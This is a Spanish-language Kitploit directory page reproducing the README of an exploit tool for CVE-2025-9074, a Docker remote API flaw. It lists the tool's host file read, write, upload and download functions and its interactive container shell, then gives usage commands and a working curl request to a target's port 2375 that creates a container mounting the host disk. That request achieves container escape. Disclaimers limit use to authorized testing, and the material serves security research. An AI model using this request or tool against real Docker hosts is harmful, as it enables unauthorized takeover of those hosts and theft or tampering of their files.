Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-9074-Docker-Exploit — Una herramienta poderosa de explotación de la API remota de Docker para la investigación y pruebas de seguridad de la vulnerabilidad CVE-2025-9074. | Kitploit
Herramientas/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad en la NubeRed TeamingEscape de Contenedores
GitHubshaoshi17/cve-2025-9074-docker-exploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-9074-Docker-Exploit

Una herramienta poderosa de explotación de la API remota de Docker para la investigación y pruebas de seguridad de la vulnerabilidad CVE-2025-9074.

Ver Repositorio
12hace 7 mesesAún no revisado

Herramienta de ejecución de comandos en contenedores Docker CVE-2025-9074

Una potente herramienta de explotación de vulnerabilidades de la API remota de Docker, para la investigación y prueba de seguridad de la vulnerabilidad CVE-2025-9074.

Ventajas principales

✅ Gestión totalmente automatizada del ciclo de vida del contenedor: Crea contenedores temporales automáticamente y los limpia automáticamente después de las operaciones, sin dejar rastro
✅ Manejo inteligente de rutas: Reconoce y convierte automáticamente las rutas de Windows al formato de montaje de Docker
✅ Flujo de operaciones totalmente automatizado: No es necesario ingresar comandos complejos manualmente, interacción basada en menús, operaciones de archivos con un solo clic
✅ Compatibilidad multiplataforma: Soporta perfectamente sistemas Windows y Linux

Capturas de pantalla de algunas funciones

image

Características

  • Operaciones con contenedores

    • Ver contenedores en ejecución
    • Ver todos los contenedores (incluidos los detenidos)
    • Crear nuevo contenedor
    • Detener contenedor
    • Eliminar contenedor
    • Ejecución de comando único
    • Terminal interactiva (requiere la biblioteca docker)
  • Gestión de imágenes

    • Ver imágenes locales
    • Descargar nueva imagen
    • Eliminar imagen
  • Operaciones de archivos en el host

    • Subir archivo al host
    • Descargar archivo del host
    • Leer contenido de archivo del host
    • Escribir archivo en el host
    • Manejo automático de mapeo de rutas de Windows Docker Desktop

Descripción de la vulnerabilidad

CVE-2025-9074 es una vulnerabilidad de seguridad en la API remota de Docker. Un atacante puede, mediante acceso no autorizado a la API de Docker:

  • Ejecutar comandos arbitrarios
  • Crear contenedores y montar discos del host
  • Lograr escape de contenedores
  • Leer/escribir archivos del host

Requisitos del entorno

  • Python 3.6+

Instalación de dependencias

Instale todas las dependencias usando requirements.txt:

root@kitploit:~
pip install -r requirements.txt

O instale manualmente:

root@kitploit:~
pip install requests docker websocket-client

Uso

Uso básico

Ejecute el script directamente, usando la dirección predeterminada de la API de Docker:

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Dirección personalizada de la API de Docker

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

Parámetros de línea de comandos

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [opciones]

Opciones:
  -u, --url URL         Dirección de la API de Docker (predeterminado: http://192.168.65.7:2375)

Explicación detallada de funciones

Operaciones con contenedores

  1. Ver contenedores en ejecución: Muestra la lista de todos los contenedores en ejecución
  2. Ver todos los contenedores: Muestra todos los contenedores (incluidos los detenidos)
  3. Crear nuevo contenedor: Crea un nuevo contenedor usando la imagen especificada
  4. Detener contenedor: Detiene un contenedor en ejecución
  5. Eliminar contenedor: Elimina un contenedor (se puede forzar la eliminación)
  6. Ejecución de comando único: Ejecuta un solo comando en el contenedor
  7. Terminal interactiva: Accede al shell interactivo del contenedor (requiere la biblioteca docker)

Uso de la terminal interactiva

  1. Después de ejecutar el script, seleccione "1. Operaciones con contenedores"
  2. Seleccione "1. Ver contenedores en ejecución"
  3. Ingrese el número de contenedor para seleccionarlo
  4. Seleccione "2. Terminal interactiva (requiere la biblioteca docker)"
  5. Ingrese el comando de shell (predeterminado: /bin/sh)
  6. Comience la operación interactiva

Gestión de imágenes

  1. Ver imágenes: Lista todas las imágenes locales
  2. Descargar imagen: Descarga una nueva imagen de Docker Hub
  3. Eliminar imagen: Elimina una imagen local

Operaciones de archivos en el host

Subir archivo al host

root@kitploit:~
1. Subir archivo al host
Ingrese la ruta del archivo local: /path/to/local/file.txt
Ingrese el directorio de destino en el host: D:/temp
Ingrese el nombre del archivo de destino (déjelo en blanco para usar el nombre original): 

Descargar archivo del host

root@kitploit:~
2. Descargar archivo del host
Ingrese la ruta del archivo en el host: D:/temp/file.txt
Ingrese la ruta de guardado local: /tmp

Leer contenido de archivo del host

root@kitploit:~
3. Leer contenido de archivo del host
Ingrese la ruta del archivo en el host: D:/temp/file.txt

Escribir archivo en el host

root@kitploit:~
4. Escribir archivo en el host
Ingrese el directorio de destino en el host: D:/temp
Ingrese el contenido del archivo: Hello, World!

Mapeo de rutas de Windows Docker Desktop

Esta herramienta maneja automáticamente el mapeo de rutas de Windows Docker Desktop:

Ruta de Windows

Formatos de entrada compatibles:

  • D:\ o D:/
  • D:\temp o D:/temp
  • "D:\file.txt" (con comillas)
  • 'D:/file.txt' (con comillas)

Precauciones de seguridad

⚠️ Aviso importante:

  1. Solo para pruebas autorizadas: Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos.
  2. Cumplimiento legal: Asegúrese de obtener autorización explícita del sistema de destino antes de usarla.
  3. Entorno aislado: Se recomienda usarla en un entorno de prueba aislado.
  4. Limitaciones de permisos: Windows Docker Desktop debe ejecutarse como administrador para escribir en la unidad C.
  5. No abuse: El uso no autorizado de esta herramienta puede violar leyes y regulaciones.

Principio técnico

Escape de contenedores

Crear un contenedor a través de la API de Docker y montar el disco del host:

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

Lectura/Escritura de archivos

Leer y escribir archivos del host ejecutando comandos en el contenedor:

root@kitploit:~
# 写入文件
echo "content" > /tmp/file.txt

# 读取文件
cat /tmp/file.txt

Solución de problemas

Error al crear contenedor (error 500)

  • Verifique si la API de Docker es accesible
  • Confirme que el formato de la ruta sea correcto
  • Verifique que la imagen exista

Error al escribir archivo

  • Windows Docker Desktop debe ejecutarse como administrador
  • Verifique la configuración de permisos del directorio de destino

La terminal interactiva no se inicia

  • Asegúrese de tener instalada la biblioteca docker: pip install docker websocket-client
  • Verifique si la terminal admite modo interactivo

Desarrollo y pruebas

Ejecutar prueba

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Estructura del código

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── Funciones de gestión de contenedores
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── Funciones de gestión de imágenes
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── Funciones de operaciones de archivos en el host
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── Funciones de utilidad
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

Contribuciones

¡Las contribuciones (Issues y Pull Requests) son bienvenidas!

Licencia

Este proyecto es solo para fines educativos y de investigación en seguridad.

Aviso legal

Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El usuario asume toda la responsabilidad y riesgo al usar esta herramienta. El autor no se hace responsable de ningún uso indebido o no autorizado de esta herramienta.

Referencias

  • Detalles de la vulnerabilidad CVE-2025-9074
  • Documentación de la API remota de Docker
  • Reglas de mapeo de rutas de Windows Docker Desktop
Descargar herramienta
Ruta de montaje de Docker
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test